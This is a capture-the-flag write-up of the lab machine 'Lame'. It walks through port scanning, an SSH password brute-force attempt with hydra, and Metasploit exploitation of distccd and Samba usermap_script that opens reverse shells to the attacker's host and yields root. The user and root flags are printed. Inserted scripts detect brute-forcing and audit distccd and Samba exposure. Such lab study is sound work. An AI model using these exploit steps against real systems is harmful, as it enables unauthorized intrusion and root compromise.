Lame

Starting information

Machine IP: 10.10.10.3
System: Linux

Network enumeration

I start by adding an entry to my /etc/hosts file so I don't have to type the IP every time:

10.10.10.3 lame

Then I look for open ports :

nmap lame -Pn 
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-22 17:18 CEST
Nmap scan report for lame (10.10.10.3)
Host is up (0.034s latency).
Not shown: 996 filtered ports
PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Now that I know there are some interesting open ports, I run nmap again with version detection and its default scripts:

nmap lame -A -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-22 17:18 CEST
Nmap scan report for lame (10.10.10.3)
Host is up (0.034s latency).
Not shown: 996 filtered ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.7
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
|_smb-security-mode: ERROR: Script execution failed (use -d to debug)
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.81 seconds

The first thing I see is that anonymous login is allowed on the FTP server. Unfortunately, no folders are visible and trying to access them directly returns an error. The anonymous login seems to be a dead end.

Not sure where to go next, I try to brute-force the password of the SSH user admin, to no avail:

hydra -l admin -P ~/Resources/SecurityTools/IntruderPayloads/FuzzLists/passwords_quick.txt lame ssh -t 4
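From the defender's side, an attempt like the one above is exactly what a review of sshd's auth.log catches. The script below is an added example and not part of the original write-up: it counts failed password attempts per source address and reports any source that reaches a threshold. The log lines are constructed sample data in OpenSSH's auth.log format; on a real host you would feed in /var/log/auth.log instead.

```shell
#!/bin/sh
# Added example (not from the original write-up): spot SSH password
# brute-forcing in auth.log by counting failures per source address.
# The log text below is constructed sample data in OpenSSH's log format.

SAMPLE_AUTH_LOG='Sep 22 17:40:01 lame sshd[2231]: Failed password for invalid user admin from 10.10.14.7 port 50122 ssh2
Sep 22 17:40:01 lame sshd[2232]: Failed password for invalid user admin from 10.10.14.7 port 50124 ssh2
Sep 22 17:40:02 lame sshd[2233]: Failed password for invalid user admin from 10.10.14.7 port 50126 ssh2
Sep 22 17:40:02 lame sshd[2234]: Failed password for invalid user admin from 10.10.14.7 port 50128 ssh2
Sep 22 17:40:03 lame sshd[2235]: Failed password for invalid user admin from 10.10.14.7 port 50130 ssh2
Sep 22 17:41:10 lame sshd[2240]: Accepted publickey for makis from 10.10.10.50 port 40010 ssh2
Sep 22 17:42:15 lame sshd[2250]: Failed password for makis from 10.10.10.50 port 40012 ssh2'

# Read log text on stdin and print "<failures> <source ip>" per source,
# most frequent first. Only sshd "Failed password" records are counted;
# the source address is the field that follows the word "from".
failed_logins_by_source() {
    awk '
        /sshd\[[0-9]+\]: Failed password for/ {
            for (i = 1; i <= NF; i++) if ($i == "from") { count[$(i + 1)]++; break }
        }
        END { for (ip in count) print count[ip], ip }
    ' | sort -rn
}

# Read log text on stdin and print only the sources whose failure count
# reaches the threshold given as $1 (default 5).
brute_force_sources() {
    threshold="${1:-5}"
    failed_logins_by_source | awk -v t="$threshold" '$1 >= t { print $2 }'
}

# Stand-alone demonstration on the constructed sample.
# Live usage: brute_force_sources 5 < /var/log/auth.log
printf '%s\n' "$SAMPLE_AUTH_LOG" | brute_force_sources 5
```

A single failed login from a legitimate user (the makis line) stays below the threshold, while the five rapid failures from one address for a non-existent account are reported. The same counting feeds naturally into a block-list tool or an alert.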

I end up doing a full port scan of the target in case I missed something important, and start an OpenVAS scan in parallel:

nmap -p- lame -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-22 17:27 CEST
Nmap scan report for lame (10.10.10.3)
Host is up (0.033s latency).
Not shown: 65530 filtered ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3632/tcp open  distccd

DistCCD

distccd is the server for the distcc distributed compiler. It accepts and runs compilation jobs for network clients. distcc can run over either TCP or a connection command such as ssh.
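Because distccd runs compiler jobs on behalf of whoever can reach its TCP port, two things decide its exposure: the address it listens on and whether a client allow-list (distccd's --allow option) is set at all. The script below is an added example and not part of the original write-up: it audits both from the output of ss and ps. The ss and ps text is constructed sample data; on a real host you would feed in the live output of `ss -ltnp` and `ps -eo args`.

```shell
#!/bin/sh
# Added example (not from the original write-up): audit how distccd is
# exposed on a host. A wildcard bind makes the daemon reachable from every
# interface, and without --allow any client that reaches the port may
# submit jobs. The ss and ps output below is constructed sample data.

SAMPLE_SS='State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0      128    0.0.0.0:3632       0.0.0.0:*         users:(("distccd",pid=5140,fd=3))
LISTEN 0      128    127.0.0.1:3632     0.0.0.0:*         users:(("distccd",pid=5141,fd=3))
LISTEN 0      128    0.0.0.0:22         0.0.0.0:*         users:(("sshd",pid=900,fd=3))'

SAMPLE_PS='/usr/bin/distccd --daemon --listen 0.0.0.0 --port 3632
/usr/bin/distccd --daemon --listen 127.0.0.1 --allow 10.10.10.0/24 --port 3632
/usr/sbin/sshd -D'

# Print "<local address:port> <verdict>" for each distccd listener.
# Verdict is EXPOSED for a wildcard bind (0.0.0.0, *, [::]), ok otherwise.
distccd_listeners() {
    printf '%s\n' "$SAMPLE_SS" | awk '
        $1 == "LISTEN" && $6 ~ /"distccd"/ {
            addr = $4; sub(/:[0-9]+$/, "", addr)
            verdict = (addr == "0.0.0.0" || addr == "*" || addr == "[::]") ? "EXPOSED" : "ok"
            print $4, verdict
        }'
}

# Print the command line of every distccd process started without --allow.
distccd_without_allow() {
    printf '%s\n' "$SAMPLE_PS" | awk '/distccd/ && !/--allow/'
}

# Stand-alone demonstration on the constructed samples.
echo "distccd listeners:"
distccd_listeners
echo "distccd processes without an allow-list:"
distccd_without_allow
```

The first sample process fails both checks: it listens on every interface and accepts any client. The second is bound to loopback and restricted to one subnet, which is the shape a hardened deployment takes; running distcc over ssh instead of raw TCP removes the open port altogether.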

Before my OpenVAS scan has even finished, I can already see two high-severity vulnerabilities, one of which is a remote code execution in distccd: CVE-2004-2687. An exploit for this CVE is available in Metasploit, so let's fire it up.

First I make sure postgresql is started.

service postgresql start

Then I start Metasploit.

msfconsole

Here is the exploit available for distcc:

msf5 > search distccd

Matching Modules
================

   #  Name                           Disclosure Date  Rank       Check  Description
   -  ----                           ---------------  ----       -----  -----------
   0  exploit/unix/misc/distcc_exec  2002-02-01       excellent  Yes    DistCC Daemon Command Execution

I select the exploit with use:

msf5 > use exploit/unix/misc/distcc_exec
msf5 exploit(unix/misc/distcc_exec) > 

For the options I just need to specify the host and the port:

msf5 exploit(unix/misc/distcc_exec) > show options

Module options (exploit/unix/misc/distcc_exec):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target address range or CIDR identifier
   RPORT   3632             yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

I set the RHOSTS option with the set command and check that the option is correctly set:

msf5 exploit(unix/misc/distcc_exec) > set RHOSTS 10.10.10.3
RHOSTS => 10.10.10.3
msf5 exploit(unix/misc/distcc_exec) > show options

Module options (exploit/unix/misc/distcc_exec):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  10.10.10.3       yes       The target address range or CIDR identifier
   RPORT   3632             yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

Great! Everything seems to be properly configured, now I can try the exploit:

msf5 exploit(unix/misc/distcc_exec) > run

[*] Started reverse TCP double handler on 10.10.14.7:4444 
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 4WOw9Ir4tJSBhdJM;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "4WOw9Ir4tJSBhdJM\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.7:4444 -> 10.10.10.3:53376) at 2019-09-22 18:15:32 +0200

ls
5140.jsvc_up

Looks like it worked!

User flag

Now that I have access to a shell on the machine, finding the user flag shouldn't be too much of a hassle.

I look at the home directories and search for the file user.txt:

cd /home

ls
ftp
makis
service
user

ls makis
user.txt

cat makis/user.txt
69454a937d94f5f0225ea00acd2e84c5

Root flag

Retrieving the user flag was a piece of cake; I suspect that the root flag will be a bit more difficult.

ls /root
Desktop
reset_logs.sh
root.txt
vnc.log


cat /root/root.txt
cat: /root/root.txt: Permission denied

I don’t have the permissions to access root.txt. I will have to find a privilege escalation.

From my OpenVAS scan I can see that Samba MS-RPC is vulnerable to a Remote Shell Command Execution Vulnerability: CVE-2007-2447.

The exploit is available in Metasploit:

msf5 > search 2007-2447

Matching Modules
================

   #  Name                                Disclosure Date  Rank       Check  Description
   -  ----                                ---------------  ----       -----  -----------
   0  exploit/multi/samba/usermap_script  2007-05-14       excellent  No     Samba "username map script" Command Execution
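The module name points at the culprit: CVE-2007-2447 is a command injection that is only reachable when Samba 3.0.0 through 3.0.25rc3 runs with a "username map script" directive configured, so a defender checks two things, whether the directive is set and whether the build is patched. The script below is an added example and not part of the original write-up. The two smb.conf texts are constructed samples, the script path in the weak one is hypothetical, and the version strings follow the "Version X.Y.Z" form printed by `smbd -V`.

```shell
#!/bin/sh
# Added example (not from the original write-up): audit smb.conf and the
# smbd version for exposure to CVE-2007-2447 ("username map script"
# command injection, Samba 3.0.0 - 3.0.25rc3). Both configuration texts
# are constructed samples; the mapusers.sh path is hypothetical.

WEAK_SMB_CONF='[global]
   workgroup = WORKGROUP
   server string = %h server (Samba, Ubuntu)
   username map script = /etc/samba/scripts/mapusers.sh
   security = user'

HARDENED_SMB_CONF='[global]
   workgroup = WORKGROUP
   server string = %h server (Samba, Ubuntu)
   security = user
   # username map script removed; static mappings belong in "username map"'

# Read smb.conf text on stdin and print the "username map script" value,
# if any. Samba ignores case and whitespace in parameter names, so the
# match does too; lines commented out with # or ; never match.
usermap_script_setting() {
    awk -F= '
        tolower($1) ~ /^[ \t]*username[ \t]*map[ \t]*script[ \t]*$/ {
            sub(/^[ \t]+/, "", $2); print $2
        }'
}

# Is the version string ($1) in the affected range 3.0.0 <= v < 3.0.25?
# The 3.0.25 release candidates (rc1-rc3) are affected; 3.0.25 itself is fixed.
affected_version() {
    v="$(printf '%s\n' "$1" | sed -n 's/.*\([0-9][0-9]*\)\.\([0-9][0-9]*\)\.\([0-9][0-9]*\)\(rc[0-9]*\)\{0,1\}.*/\1 \2 \3 \4/p')"
    [ -n "$v" ] || return 1
    set -- $v    # $1=major $2=minor $3=patch $4=rc suffix (may be empty)
    if [ "$1" -ne 3 ] || [ "$2" -ne 0 ]; then return 1; fi
    if [ "$3" -lt 25 ]; then return 0; fi
    if [ "$3" -eq 25 ] && [ -n "$4" ]; then return 0; fi
    return 1
}

# Exit 0 when the host is exposed (directive set on an affected build),
# 1 otherwise. $1 is the smbd version string, $2 the smb.conf text.
smb_usermap_exposed() {
    setting="$(printf '%s\n' "$2" | usermap_script_setting)"
    [ -n "$setting" ] || return 1   # directive absent: injection point not reachable
    affected_version "$1"           # directive set: depends on the build
}

# Stand-alone demonstration on the constructed samples.
for conf in WEAK_SMB_CONF HARDENED_SMB_CONF; do
    eval "text=\$$conf"
    if smb_usermap_exposed "Version 3.0.20-Debian" "$text"; then
        echo "$conf on 3.0.20: EXPOSED"
    else
        echo "$conf on 3.0.20: ok"
    fi
done
```

Removing the directive closes the injection point even on an unpatched build, but the lasting fix is upgrading smbd; the script treats either change as sufficient so that it can be run both before and after patching.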

Now I just have to configure it and run it:

msf5 exploit(multi/samba/usermap_script) > set RHOSTS 10.10.10.3
RHOSTS => 10.10.10.3
msf5 exploit(multi/samba/usermap_script) > run

[*] Started reverse TCP double handler on 10.10.14.7:4444 
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo gnLmqtNCReENz5i3;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "gnLmqtNCReENz5i3\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.7:4444 -> 10.10.10.3:39128) at 2019-09-22 18:35:52 +0200


id
uid=0(root) gid=0(root)

It looks like I am root. Let’s see if I can get the root flag:

ls /root
Desktop
reset_logs.sh
root.txt
vnc.log

cat /root/root.txt
92caac3be140ef409e45721348a4e9df